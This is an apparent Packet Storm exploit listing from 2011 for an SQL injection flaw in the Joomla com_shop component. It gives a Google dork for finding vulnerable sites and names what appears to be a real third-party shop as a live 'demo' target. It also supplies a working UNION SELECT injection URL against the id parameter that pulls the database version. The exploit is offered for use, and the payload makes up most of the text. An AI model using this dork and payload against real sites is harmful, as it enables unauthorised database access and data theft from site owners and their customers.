Joomla Shop SQL Injection

2011-10-11T00:00:00
ID PACKETSTORM:105670
Type packetstorm
Reporter CoBRa_21
Modified 2011-10-11T00:00:00

Description

                                        
                                            `################################################################################################  
# Exploit Title: Joomla Component (com_shop) SQL Injection Vulnerability  
#  
# Author : CoBRa_21   
#  
# E-Mail : ghost1lover[at]hotmail.com  
#  
# Google Dork : inurl:index.php?option=com_shop  
#  
# Demo: http://www.blackmoneyclothing.com/index.php?option=com_shop&view=details&id=29  
################################################################################################  
#  
# Exploit:  
#  
# http://127.0.0.1/index.php?option=com_shop&view=details&id=-29 (SQL)  
#  
# http://127.0.0.1/index.php?option=com_shop&view=details&id=-29 union select 0,1,2,version(),4,5,6,7,8,9,10,11,12  
################################################################################################  
# Pentester CoBRa_21 Thanks e-banka.org & cyber-warrior.org & AKINCILAR #  
################################################################################################  
  
  
  
`